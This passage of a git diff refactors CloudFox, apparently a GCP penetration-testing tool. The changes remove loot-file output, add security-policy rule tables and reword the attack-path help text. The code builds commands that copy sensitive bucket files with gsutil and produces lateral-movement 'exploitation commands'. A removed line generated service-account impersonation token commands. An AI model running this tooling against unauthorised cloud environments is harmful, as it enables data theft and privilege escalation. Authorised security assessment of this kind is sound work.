buckets with many objects. -Use --max-objects to limit the scan, or --no-limit for unlimited.`, +Flags: + --all-objects Report ALL bucket objects (not just sensitive files) + --no-limit Remove the 1000 object-per-bucket scan limit + --max-objects Set a custom object-per-bucket scan limit + +By default, only sensitive files are reported with a 1000 object scan limit. +WARNING: --all-objects and --no-limit may take a long time for large buckets.`, Run: runGCPBucketEnumCommand, } func init() { - GCPBucketEnumCommand.Flags().IntVar(&bucketEnumMaxObjects, "max-objects", 1000, "Maximum objects to scan per bucket (default 1000)") - GCPBucketEnumCommand.Flags().BoolVar(&bucketEnumAllObjects, "all-objects", false, "Enumerate ALL bucket contents, not just sensitive files (implies --no-limit unless --max-objects is set)") - GCPBucketEnumCommand.Flags().BoolVar(&bucketEnumNoLimit, "no-limit", false, "Remove the object limit (enumerate all objects in each bucket)") + GCPBucketEnumCommand.Flags().IntVar(&bucketEnumMaxObjects, "max-objects", 1000, "Maximum objects to scan per bucket") + GCPBucketEnumCommand.Flags().BoolVar(&bucketEnumAllObjects, "all-objects", false, "Report ALL objects, not just sensitive files (implies --no-limit unless --max-objects is set)") + GCPBucketEnumCommand.Flags().BoolVar(&bucketEnumNoLimit, "no-limit", false, "Remove the 1000 object-per-bucket scan limit (still only reports sensitive files)") } type BucketEnumModule struct { @@ -290,14 +294,14 @@ func (m *BucketEnumModule) addFileToLoot(projectID string, file bucketenumservic localDir := fmt.Sprintf("bucket/%s/%s", file.BucketName, getObjectDir(file.ObjectName)) localCpCmd := fmt.Sprintf("gsutil cp gs://%s/%s %s", file.BucketName, file.ObjectName, localDir) - // All files go to the general commands file + // All files go to the general commands file (without risk ranking) if lootFile := m.LootMap[projectID]["bucket-enum-commands"]; lootFile != nil { lootFile.Contents += fmt.Sprintf( - "# [%s] %s - gs://%s/%s\n"+ - "# Category: %s, Size: %d bytes\n"+ + "# %s - gs://%s/%s\n"+ + "# %s, Size: %d bytes\n"+ "mkdir -p %s\n"+ "%s\n\n", - file.RiskLevel, file.Category, + file.Category, file.BucketName, file.ObjectName, file.Description, file.Size, localDir, diff --git a/gcp/commands/certmanager.go b/gcp/commands/certmanager.go index f7874329..0e279059 100644 --- a/gcp/commands/certmanager.go +++ b/gcp/commands/certmanager.go @@ -49,7 +49,6 @@ type CertManagerModule struct { ProjectCertificates map[string][]certmanagerservice.Certificate // projectID -> certificates ProjectSSLCertificates map[string][]certmanagerservice.SSLCertificate // projectID -> SSL certs ProjectCertMaps map[string][]certmanagerservice.CertificateMap // projectID -> cert maps - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files mu sync.Mutex } @@ -78,7 +77,6 @@ func runGCPCertManagerCommand(cmd *cobra.Command, args []string) { ProjectCertificates: make(map[string][]certmanagerservice.Certificate), ProjectSSLCertificates: make(map[string][]certmanagerservice.SSLCertificate), ProjectCertMaps: make(map[string][]certmanagerservice.CertificateMap), - LootMap: make(map[string]map[string]*internal.LootFile), } module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -166,17 +164,6 @@ func (m *CertManagerModule) processProject(ctx context.Context, projectID string svc := certmanagerservice.New() - m.mu.Lock() - // Initialize loot for this project - if m.LootMap[projectID] == nil { - m.LootMap[projectID] = make(map[string]*internal.LootFile) - m.LootMap[projectID]["certmanager-details"] = &internal.LootFile{ - Name: "certmanager-details", - Contents: "# Certificate Manager Details\n# Generated by CloudFox\n\n", - } - } - m.mu.Unlock() - // Get Certificate Manager certs certs, err := svc.GetCertificates(projectID) if err != nil { @@ -205,93 +192,9 @@ func (m *CertManagerModule) processProject(ctx context.Context, projectID string m.ProjectCertificates[projectID] = certs m.ProjectSSLCertificates[projectID] = sslCerts m.ProjectCertMaps[projectID] = certMaps - - for _, cert := range certs { - m.addCertToLoot(projectID, cert) - } - for _, cert := range sslCerts { - m.addSSLCertToLoot(projectID, cert) - } m.mu.Unlock() } -// ------------------------------ -// Loot File Management -// ------------------------------ -func (m *CertManagerModule) addCertToLoot(projectID string, cert certmanagerservice.Certificate) { - lootFile := m.LootMap[projectID]["certmanager-details"] - if lootFile == nil { - return - } - // Build flags for special attributes - var flags []string - if cert.Wildcard { - flags = append(flags, "WILDCARD") - } - if cert.Expired { - flags = append(flags, "EXPIRED") - } else if cert.DaysUntilExpiry <= 30 { - flags = append(flags, "EXPIRING") - } - if cert.SelfManaged { - flags = append(flags, "SELF-MANAGED") - } - - flagStr := "" - if len(flags) > 0 { - flagStr = " [" + strings.Join(flags, "] [") + "]" - } - - lootFile.Contents += fmt.Sprintf( - "# %s%s\n"+ - "Project: %s | Location: %s\n"+ - "Type: %s | State: %s\n"+ - "Domains: %s\n"+ - "Expires: %s (%d days)\n\n", - cert.Name, flagStr, - cert.ProjectID, cert.Location, - cert.Type, cert.State, - strings.Join(cert.Domains, ", "), - cert.ExpireTime, cert.DaysUntilExpiry, - ) -} - -func (m *CertManagerModule) addSSLCertToLoot(projectID string, cert certmanagerservice.SSLCertificate) { - lootFile := m.LootMap[projectID]["certmanager-details"] - if lootFile == nil { - return - } - // Build flags for special attributes - var flags []string - if cert.Wildcard { - flags = append(flags, "WILDCARD") - } - if cert.Expired { - flags = append(flags, "EXPIRED") - } else if cert.DaysUntilExpiry <= 30 { - flags = append(flags, "EXPIRING") - } - if cert.SelfManaged { - flags = append(flags, "SELF-MANAGED") - } - - flagStr := "" - if len(flags) > 0 { - flagStr = " [" + strings.Join(flags, "] [") + "]" - } - - lootFile.Contents += fmt.Sprintf( - "# %s (SSL Certificate)%s\n"+ - "Project: %s | Type: %s\n"+ - "Domains: %s\n"+ - "Expires: %s (%d days)\n\n", - cert.Name, flagStr, - cert.ProjectID, cert.Type, - strings.Join(cert.Domains, ", "), - cert.ExpireTime, cert.DaysUntilExpiry, - ) -} - // ------------------------------ // Output Generation // ------------------------------ @@ -429,17 +332,7 @@ func (m *CertManagerModule) writeHierarchicalOutput(ctx context.Context, logger for projectID := range projectIDs { tableFiles := m.buildTablesForProject(projectID) - - var lootFiles []internal.LootFile - if projectLoot, ok := m.LootMap[projectID]; ok { - for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - } - - outputData.ProjectLevelData[projectID] = CertManagerOutput{Table: tableFiles, Loot: lootFiles} + outputData.ProjectLevelData[projectID] = CertManagerOutput{Table: tableFiles} } pathBuilder := m.BuildPathBuilder() @@ -473,16 +366,7 @@ func (m *CertManagerModule) writeFlatOutput(ctx context.Context, logger internal }) } - var lootFiles []internal.LootFile - for _, projectLoot := range m.LootMap { - for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - } - - output := CertManagerOutput{Table: tables, Loot: lootFiles} + output := CertManagerOutput{Table: tables} scopeNames := make([]string, len(m.ProjectIDs)) for i, projectID := range m.ProjectIDs { diff --git a/gcp/commands/cloudarmor.go b/gcp/commands/cloudarmor.go index 4f32eba3..a722bde7 100644 --- a/gcp/commands/cloudarmor.go +++ b/gcp/commands/cloudarmor.go @@ -43,10 +43,9 @@ What this module finds: type CloudArmorModule struct { gcpinternal.BaseGCPModule - ProjectPolicies map[string][]cloudarmorservice.SecurityPolicy // projectID -> policies - UnprotectedLBs map[string][]string // projectID -> LB names - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - mu sync.Mutex + ProjectPolicies map[string][]cloudarmorservice.SecurityPolicy // projectID -> policies + UnprotectedLBs map[string][]string // projectID -> LB names + mu sync.Mutex } // ------------------------------ @@ -73,7 +72,6 @@ func runGCPCloudArmorCommand(cmd *cobra.Command, args []string) { BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), ProjectPolicies: make(map[string][]cloudarmorservice.SecurityPolicy), UnprotectedLBs: make(map[string][]string), - LootMap: make(map[string]map[string]*internal.LootFile), } module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -130,17 +128,6 @@ func (m *CloudArmorModule) processProject(ctx context.Context, projectID string, logger.InfoM(fmt.Sprintf("Checking Cloud Armor in project: %s", projectID), globals.GCP_CLOUDARMOR_MODULE_NAME) } - m.mu.Lock() - // Initialize loot for this project - if m.LootMap[projectID] == nil { - m.LootMap[projectID] = make(map[string]*internal.LootFile) - m.LootMap[projectID]["cloudarmor-details"] = &internal.LootFile{ - Name: "cloudarmor-details", - Contents: "# Cloud Armor Details\n# Generated by CloudFox\n\n", - } - } - m.mu.Unlock() - svc := cloudarmorservice.New() // Get security policies @@ -164,103 +151,9 @@ func (m *CloudArmorModule) processProject(ctx context.Context, projectID string, if len(unprotectedLBs) > 0 { m.UnprotectedLBs[projectID] = unprotectedLBs } - - for _, policy := range policies { - m.addPolicyToLoot(projectID, policy) - } - for _, lb := range unprotectedLBs { - m.addUnprotectedLBToLoot(projectID, lb) - } m.mu.Unlock() } -// ------------------------------ -// Loot File Management -// ------------------------------ -func (m *CloudArmorModule) addPolicyToLoot(projectID string, policy cloudarmorservice.SecurityPolicy) { - lootFile := m.LootMap[projectID]["cloudarmor-details"] - if lootFile == nil { - return - } - - // Build flags for special attributes - var flags []string - if len(policy.Weaknesses) > 0 { - flags = append(flags, "HAS WEAKNESSES") - } - - flagStr := "" - if len(flags) > 0 { - flagStr = " [" + strings.Join(flags, "] [") + "]" - } - - adaptive := "No" - if policy.AdaptiveProtection { - adaptive = "Yes" - } - - resources := "None" - if len(policy.AttachedResources) > 0 { - resources = strings.Join(policy.AttachedResources, ", ") - } - - lootFile.Contents += fmt.Sprintf( - "# %s%s\n"+ - "Project: %s | Type: %s\n"+ - "Rules: %d | Adaptive Protection: %s\n"+ - "Attached Resources: %s\n", - policy.Name, flagStr, - policy.ProjectID, policy.Type, - policy.RuleCount, adaptive, - resources, - ) - - // Add weaknesses if any - if len(policy.Weaknesses) > 0 { - lootFile.Contents += "Weaknesses:\n" - for _, weakness := range policy.Weaknesses { - lootFile.Contents += fmt.Sprintf(" - %s\n", weakness) - } - } - - // Add rules - if len(policy.Rules) > 0 { - lootFile.Contents += "Rules:\n" - for _, rule := range policy.Rules { - preview := "" - if rule.Preview { - preview = " [PREVIEW]" - } - lootFile.Contents += fmt.Sprintf( - " - Priority %d: %s%s\n"+ - " Match: %s\n", - rule.Priority, rule.Action, preview, - rule.Match, - ) - if rule.RateLimitConfig != nil { - lootFile.Contents += fmt.Sprintf( - " Rate Limit: %d requests per %d seconds\n", - rule.RateLimitConfig.ThresholdCount, - rule.RateLimitConfig.IntervalSec, - ) - } - } - } - - lootFile.Contents += "\n" -} - -func (m *CloudArmorModule) addUnprotectedLBToLoot(projectID, lbName string) { - if lootFile := m.LootMap[projectID]["cloudarmor-details"]; lootFile != nil { - lootFile.Contents += fmt.Sprintf( - "# %s [UNPROTECTED]\n"+ - "Project: %s\n"+ - "No Cloud Armor policy attached\n\n", - lbName, projectID, - ) - } -} - // ------------------------------ // Output Generation // ------------------------------ @@ -273,11 +166,15 @@ func (m *CloudArmorModule) writeOutput(ctx context.Context, logger internal.Logg } func (m *CloudArmorModule) getPoliciesHeader() []string { - return []string{"Project", "Name", "Type", "Rules", "Attached Resources", "Adaptive Protection"} + return []string{"Project", "Policy", "Type", "Rules", "Adaptive", "DDoS", "Attached To", "Weaknesses"} +} + +func (m *CloudArmorModule) getRulesHeader() []string { + return []string{"Project", "Policy", "Priority", "Action", "Preview", "Match", "Rate Limit"} } func (m *CloudArmorModule) getUnprotectedLBsHeader() []string { - return []string{"Project", "Backend Service"} + return []string{"Project", "Backend Service", "Status"} } func (m *CloudArmorModule) policiesToTableBody(policies []cloudarmorservice.SecurityPolicy) [][]string { @@ -288,29 +185,75 @@ func (m *CloudArmorModule) policiesToTableBody(policies []cloudarmorservice.Secu adaptive = "Yes" } + ddos := "-" + if policy.DDOSProtection != "" { + ddos = policy.DDOSProtection + } + resources := "-" if len(policy.AttachedResources) > 0 { resources = strings.Join(policy.AttachedResources, ", ") } + weaknesses := "-" + if len(policy.Weaknesses) > 0 { + weaknesses = strings.Join(policy.Weaknesses, "; ") + } + body = append(body, []string{ m.GetProjectName(policy.ProjectID), policy.Name, policy.Type, fmt.Sprintf("%d", policy.RuleCount), - resources, adaptive, + ddos, + resources, + weaknesses, }) } return body } +func (m *CloudArmorModule) rulesToTableBody(policies []cloudarmorservice.SecurityPolicy) [][]string { + var body [][]string + for _, policy := range policies { + for _, rule := range policy.Rules { + preview := "No" + if rule.Preview { + preview = "Yes" + } + + rateLimit := "-" + if rule.RateLimitConfig != nil { + rateLimit = fmt.Sprintf("%d/%ds", rule.RateLimitConfig.ThresholdCount, rule.RateLimitConfig.IntervalSec) + } + + match := rule.Match + if len(match) > 80 { + match = match[:77] + "..." + } + + body = append(body, []string{ + m.GetProjectName(policy.ProjectID), + policy.Name, + fmt.Sprintf("%d", rule.Priority), + rule.Action, + preview, + match, + rateLimit, + }) + } + } + return body +} + func (m *CloudArmorModule) unprotectedLBsToTableBody(projectID string, lbs []string) [][]string { var body [][]string for _, lb := range lbs { body = append(body, []string{ m.GetProjectName(projectID), lb, + "UNPROTECTED", }) } return body @@ -325,6 +268,16 @@ func (m *CloudArmorModule) buildTablesForProject(projectID string) []internal.Ta Header: m.getPoliciesHeader(), Body: m.policiesToTableBody(policies), }) + + // Add rules table if there are rules + rulesBody := m.rulesToTableBody(policies) + if len(rulesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "security-policy-rules", + Header: m.getRulesHeader(), + Body: rulesBody, + }) + } } if lbs, ok := m.UnprotectedLBs[projectID]; ok && len(lbs) > 0 { @@ -355,17 +308,7 @@ func (m *CloudArmorModule) writeHierarchicalOutput(ctx context.Context, logger i for projectID := range projectIDs { tableFiles := m.buildTablesForProject(projectID) - - var lootFiles []internal.LootFile - if projectLoot, ok := m.LootMap[projectID]; ok { - for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - } - - outputData.ProjectLevelData[projectID] = CloudArmorOutput{Table: tableFiles, Loot: lootFiles} + outputData.ProjectLevelData[projectID] = CloudArmorOutput{Table: tableFiles} } pathBuilder := m.BuildPathBuilder() @@ -388,6 +331,18 @@ func (m *CloudArmorModule) writeFlatOutput(ctx context.Context, logger internal. }) } + // Add rules table if there are rules + if len(allPolicies) > 0 { + rulesBody := m.rulesToTableBody(allPolicies) + if len(rulesBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "security-policy-rules", + Header: m.getRulesHeader(), + Body: rulesBody, + }) + } + } + // Build unprotected LBs table from all projects var allUnprotectedBody [][]string for projectID, lbs := range m.UnprotectedLBs { @@ -401,16 +356,7 @@ func (m *CloudArmorModule) writeFlatOutput(ctx context.Context, logger internal. }) } - var lootFiles []internal.LootFile - for _, projectLoot := range m.LootMap { - for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - } - - output := CloudArmorOutput{Table: tables, Loot: lootFiles} + output := CloudArmorOutput{Table: tables} scopeNames := make([]string, len(m.ProjectIDs)) for i, id := range m.ProjectIDs { diff --git a/gcp/commands/cloudbuild.go b/gcp/commands/cloudbuild.go index 4f7bd42b..be2ddf0a 100644 --- a/gcp/commands/cloudbuild.go +++ b/gcp/commands/cloudbuild.go @@ -347,7 +347,7 @@ func (m *CloudBuildModule) triggersToTableBody(triggers []cloudbuildservice.Trig } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "run --attack-paths" + attackPaths := "run foxmapper" if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { if sa != "(default)" && sa != "" { attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) diff --git a/gcp/commands/cloudrun.go b/gcp/commands/cloudrun.go index 41e46361..838dbe6f 100644 --- a/gcp/commands/cloudrun.go +++ b/gcp/commands/cloudrun.go @@ -31,7 +31,7 @@ Security Columns: - Ingress: INGRESS_TRAFFIC_ALL (public), INTERNAL_ONLY, or INTERNAL_LOAD_BALANCER - Public: Whether allUsers or allAuthenticatedUsers can invoke the service - Service Account: The identity the service runs as -- SA Attack Paths: Privesc/exfil/lateral movement potential (requires --attack-paths) +- SA Attack Paths: Privesc/exfil/lateral movement potential (run foxmapper first) - VPC Access: Network connectivity to VPC resources - Env Vars: Count of plain environment variables - Secret Mgr: Count of env vars referencing Secret Manager (secure storage) @@ -44,10 +44,7 @@ Attack Surface: - Container images may contain vulnerabilities or secrets - Hardcoded secrets in env vars are a critical security risk -TIP: To see service account attack paths (privesc, exfil, lateral movement), -use the global --attack-paths flag: - - cloudfox gcp cloudrun -p PROJECT_ID --attack-paths`, +TIP: Run foxmapper first to populate the SA Attack Paths column.`, Run: runGCPCloudRunCommand, } @@ -469,7 +466,7 @@ func (m *CloudRunModule) buildTablesForProject(projectID string, services []Clou } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "run --attack-paths" + attackPaths := "run foxmapper" if svc.ServiceAccount != "" { attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, svc.ServiceAccount) } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { @@ -537,7 +534,7 @@ func (m *CloudRunModule) buildTablesForProject(projectID string, services []Clou } // Check attack paths (privesc/exfil/lateral) for the service account - jobAttackPaths := "run --attack-paths" + jobAttackPaths := "run foxmapper" if job.ServiceAccount != "" { jobAttackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, job.ServiceAccount) } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { diff --git a/gcp/commands/composer.go b/gcp/commands/composer.go index f3a8c397..a56777e4 100644 --- a/gcp/commands/composer.go +++ b/gcp/commands/composer.go @@ -201,7 +201,7 @@ func (m *ComposerModule) environmentsToTableBody(environments []composerservice. } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "run --attack-paths" + attackPaths := "run foxmapper" if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { if sa != "(default)" && sa != "" { attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) diff --git a/gcp/commands/crossproject.go b/gcp/commands/crossproject.go index eec453b1..dbaab161 100644 --- a/gcp/commands/crossproject.go +++ b/gcp/commands/crossproject.go @@ -33,27 +33,27 @@ Features: - Discovers Pub/Sub subscriptions exporting to other projects (BQ, GCS, push) - Generates exploitation commands for lateral movement - Highlights service accounts spanning trust boundaries -- Shows impersonation targets when --attack-paths flag is used +- Shows impersonation targets (run foxmapper first for attack path analysis) -RECOMMENDED: For comprehensive cross-project analysis, use with -A and --org-cache -to automatically discover all accessible projects in your organization: +RECOMMENDED: For comprehensive cross-project analysis, use -A to analyze all accessible projects: - cloudfox gcp crossproject -A --org-cache --attack-paths + cloudfox gcp crossproject -A This will: -- Discover all projects you have access to (--org-cache) -- Analyze cross-project patterns across all of them (-A) -- Include impersonation targets and attack paths (--attack-paths) +- Use cached org/folder/project data (auto-populated, refreshes every 24h) +- Analyze cross-project patterns across all accessible projects - Show "Trust Boundary" column indicating if target is Internal, External, or Unknown -TRUST BOUNDARY COLUMN (requires --org-cache): +TRUST BOUNDARY COLUMN: - "Internal" - Target project is within your organization - "External" - Target project is outside your organization (trust boundary crossing!) -- "Unknown" - Org cache not available, cannot determine boundary +- "Unknown" - Cannot determine boundary ALTERNATIVE: Specify projects manually with -l for a project list file: - cloudfox gcp crossproject -l projects.txt --attack-paths + cloudfox gcp crossproject -l projects.txt + +TIP: Run foxmapper first to populate the Attack Paths column. WARNING: Requires multiple projects to be specified for effective analysis. Single project analysis (-p) will have limited results.`, @@ -124,7 +124,7 @@ func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_CROSSPROJECT_MODULE_NAME) } - // Get org cache from context (populated by --org-cache flag or all-checks) + // Get org cache from context (auto-loaded at startup) m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) // If no context cache, try loading from disk cache @@ -234,11 +234,13 @@ func (m *CrossProjectModule) initializeLootFiles() { } func (m *CrossProjectModule) addBindingToLoot(binding crossprojectservice.CrossProjectBinding) { - // Add exploitation commands + // Only add if there are exploitation commands if len(binding.ExploitCommands) > 0 { m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( - "# IAM Binding: %s -> %s\n# Principal: %s\n# Role: %s\n", - binding.SourceProject, binding.TargetProject, binding.Principal, binding.Role, + "### %s -> %s (%s)\n", + m.GetProjectName(binding.SourceProject), + m.GetProjectName(binding.TargetProject), + cleanRole(binding.Role), ) for _, cmd := range binding.ExploitCommands { m.LootMap["crossproject-commands"].Contents += cmd + "\n" @@ -248,66 +250,40 @@ func (m *CrossProjectModule) addBindingToLoot(binding crossprojectservice.CrossP } func (m *CrossProjectModule) addServiceAccountToLoot(sa crossprojectservice.CrossProjectServiceAccount) { - // Add impersonation commands for cross-project SAs - m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( - "# Cross-project SA: %s (Home: %s)\n"+ - "gcloud auth print-access-token --impersonate-service-account=%s\n\n", - sa.Email, sa.ProjectID, sa.Email, - ) + // Skip - service account cross-project access is covered by bindings and lateral movement paths + // Adding separate impersonation commands would be redundant } func (m *CrossProjectModule) addLateralMovementToLoot(path crossprojectservice.LateralMovementPath) { - // Add lateral movement exploitation commands - m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( - "# Lateral Movement: %s -> %s\n"+ - "# Principal: %s\n"+ - "# Method: %s\n"+ - "# Target Roles: %s\n", - path.SourceProject, path.TargetProject, - path.SourcePrincipal, - path.AccessMethod, - strings.Join(path.TargetRoles, ", "), - ) - + // Only add if there are exploitation commands if len(path.ExploitCommands) > 0 { + // Clean up role names for display + var cleanedRoles []string + for _, r := range path.TargetRoles { + cleanedRoles = append(cleanedRoles, cleanRole(r)) + } + + m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( + "### %s -> %s (%s)\n", + m.GetProjectName(path.SourceProject), + m.GetProjectName(path.TargetProject), + strings.Join(cleanedRoles, ", "), + ) for _, cmd := range path.ExploitCommands { m.LootMap["crossproject-commands"].Contents += cmd + "\n" } + m.LootMap["crossproject-commands"].Contents += "\n" } - m.LootMap["crossproject-commands"].Contents += "\n" } func (m *CrossProjectModule) addLoggingSinkToLoot(sink crossprojectservice.CrossProjectLoggingSink) { - m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( - "# Cross-Project Logging Sink: %s\n"+ - "# Source Project: %s -> Target Project: %s\n"+ - "# Destination: %s (%s)\n", - sink.SinkName, - sink.SourceProject, sink.TargetProject, - sink.Destination, sink.DestinationType, - ) - m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( - "gcloud logging sinks describe %s --project=%s\n\n", - sink.SinkName, sink.SourceProject, - ) + // Logging sinks are data exports, not direct exploitation paths + // Skip adding to loot - the table output is sufficient } func (m *CrossProjectModule) addPubSubExportToLoot(export crossprojectservice.CrossProjectPubSubExport) { - m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( - "# Cross-Project Pub/Sub Export: %s\n"+ - "# Subscription: %s (Source: %s)\n"+ - "# Topic: %s (Project: %s)\n"+ - "# Export Type: %s -> Destination: %s\n", - export.SubscriptionName, - export.SubscriptionName, export.SourceProject, - export.TopicName, export.TopicProject, - export.ExportType, - export.ExportDest, - ) - m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( - "gcloud pubsub subscriptions describe %s --project=%s\n\n", - export.SubscriptionName, export.SourceProject, - ) + // Pub/Sub exports are data exports, not direct exploitation paths + // Skip adding to loot - the table output is sufficient } // ------------------------------ @@ -634,6 +610,7 @@ func (m *CrossProjectModule) writeFlatOutput(ctx context.Context, logger interna lootFiles := m.collectLootFiles() // Write output for each target project separately + isFirstProject := true for targetProject, body := range bodyByProject { if len(body) == 0 { continue @@ -647,9 +624,16 @@ func (m *CrossProjectModule) writeFlatOutput(ctx context.Context, logger interna }, } + // Only include loot files on the first project to avoid duplicate writes + var projectLoot []internal.LootFile + if isFirstProject { + projectLoot = lootFiles + isFirstProject = false + } + output := CrossProjectOutput{ Table: tables, - Loot: lootFiles, + Loot: projectLoot, } err := internal.HandleOutputSmart( diff --git a/gcp/commands/dataflow.go b/gcp/commands/dataflow.go index 688ef18a..1f816a58 100644 --- a/gcp/commands/dataflow.go +++ b/gcp/commands/dataflow.go @@ -191,7 +191,7 @@ func (m *DataflowModule) jobsToTableBody(jobs []dataflowservice.JobInfo) [][]str } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "run --attack-paths" + attackPaths := "run foxmapper" if job.ServiceAccount != "" && m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, job.ServiceAccount) } else { diff --git a/gcp/commands/dataproc.go b/gcp/commands/dataproc.go index d446eeb7..1fa95bba 100644 --- a/gcp/commands/dataproc.go +++ b/gcp/commands/dataproc.go @@ -201,7 +201,7 @@ func (m *DataprocModule) clustersToTableBody(clusters []dataprocservice.ClusterI } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "run --attack-paths" + attackPaths := "run foxmapper" if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { if sa != "(default)" && sa != "" { attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) diff --git a/gcp/commands/functions.go b/gcp/commands/functions.go index d97a0e77..5606b497 100644 --- a/gcp/commands/functions.go +++ b/gcp/commands/functions.go @@ -45,10 +45,7 @@ Attack Surface: - Functions with VPC connectors can access internal resources - Event triggers reveal integration points (Pub/Sub, Storage, etc.) -TIP: To see service account attack paths (privesc, exfil, lateral movement), -use the global --attack-paths flag: - - cloudfox gcp functions -p PROJECT_ID --attack-paths`, +TIP: Run foxmapper first to populate the Attack Paths column with privesc/exfil/lateral movement analysis.`, Run: runGCPFunctionsCommand, } @@ -551,7 +548,7 @@ func (m *FunctionsModule) functionsToTableBody(functions []FunctionsService.Func } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "run --attack-paths" + attackPaths := "run foxmapper" if serviceAccount != "-" { attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, serviceAccount) } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { diff --git a/gcp/commands/gke.go b/gcp/commands/gke.go index 58a216f4..5aac1f6d 100644 --- a/gcp/commands/gke.go +++ b/gcp/commands/gke.go @@ -391,7 +391,7 @@ func (m *GKEModule) buildTablesForProject(clusters []GKEService.ClusterInfo, nod } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "run --attack-paths" + attackPaths := "run foxmapper" if saDisplay != "-" { attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, saDisplay) } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index 07e7353b..d66a5c92 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -864,7 +864,7 @@ func (m *InstancesModule) instancesToTableBody(instances []ComputeEngineService. // Check attack paths (privesc/exfil/lateral) for the service account // FoxMapper takes priority if available (graph-based analysis) - attackPaths := "run --attack-paths" + attackPaths := "run foxmapper" if saEmail != "-" { attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, saEmail) } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { diff --git a/gcp/commands/notebooks.go b/gcp/commands/notebooks.go index 02329849..1c78a25c 100644 --- a/gcp/commands/notebooks.go +++ b/gcp/commands/notebooks.go @@ -237,7 +237,7 @@ func (m *NotebooksModule) instancesToTableBody(instances []notebooksservice.Note } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "run --attack-paths" + attackPaths := "run foxmapper" if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { if sa != "(default)" && sa != "" { attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) @@ -292,7 +292,7 @@ func (m *NotebooksModule) runtimesToTableBody(runtimes []notebooksservice.Runtim } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "run --attack-paths" + attackPaths := "run foxmapper" if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { if sa != "-" && sa != "" { attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) diff --git a/gcp/commands/organizations.go b/gcp/commands/organizations.go index a64be237..58e5deb7 100644 --- a/gcp/commands/organizations.go +++ b/gcp/commands/organizations.go @@ -85,7 +85,7 @@ func runGCPOrganizationsCommand(cmd *cobra.Command, args []string) { func (m *OrganizationsModule) Execute(ctx context.Context, logger internal.Logger) { orgsSvc := orgsservice.New() - // Check if org cache is available (from all-checks or --org-cache flag) + // Check if org cache is available (auto-loaded at startup) if orgCache := gcpinternal.GetOrgCacheFromContext(ctx); orgCache != nil && orgCache.IsPopulated() { logger.InfoM("Using cached organization data", globals.GCP_ORGANIZATIONS_MODULE_NAME) diff --git a/gcp/commands/scheduler.go b/gcp/commands/scheduler.go index 919b679f..898df5b1 100644 --- a/gcp/commands/scheduler.go +++ b/gcp/commands/scheduler.go @@ -265,7 +265,7 @@ func (m *SchedulerModule) jobsToTableBody(jobs []SchedulerService.JobInfo) [][]s } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "run --attack-paths" + attackPaths := "run foxmapper" if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { if sa != "-" { 